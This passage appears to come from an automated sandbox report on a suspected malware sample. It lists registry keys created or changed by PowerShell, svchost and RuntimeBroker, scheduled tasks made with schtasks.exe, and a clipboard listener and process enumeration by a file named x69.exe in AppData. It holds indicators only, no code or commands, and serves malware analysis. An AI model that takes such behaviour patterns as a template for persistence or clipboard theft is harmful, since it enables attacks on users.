| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecision = "0" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecisionTime = 38c7fe8f3dc9db01 | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = (binary data omitted) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = d216597c3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = 947fe37b3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\156b72c5e65c061eb4663b015eec1f0fada4bdcb27c7635cfb0b5a948bf4cd48" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58318078e6a30ee7ec4597ee1fb7a40bfa94836468c204e06ef9029ba038d7e0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = (binary data omitted) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- = f541f07a3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- = 97c2fa7a3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58318078e6a30ee7ec4597ee1fb7a40bfa94836468c204e06ef9029ba038d7e0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2dcfc67fe523e1f6f503602bbb5f955d40b381101dbfc4fdf0b856311a7e53a2" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = (binary data omitted) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\156b72c5e65c061eb4663b015eec1f0fada4bdcb27c7635cfb0b5a948bf4cd48" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- = (binary data omitted) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = 6438fd7b3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- = (binary data omitted) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = 9e78b67b3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = ad8e467c3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\32c1033c1063e73bda331eccb913520fcc27c5e3a6ae46ac9db9daad25815e56" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d35f678c-1556-4b5b- = 830b2b7c3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dc7a540c510e51f15f1e52344479a09b42aa587b1ea02dfee89b07ab978e1f1e" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bfb26-e7c9-47b0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Suspicious behavior: EnumeratesProcesses
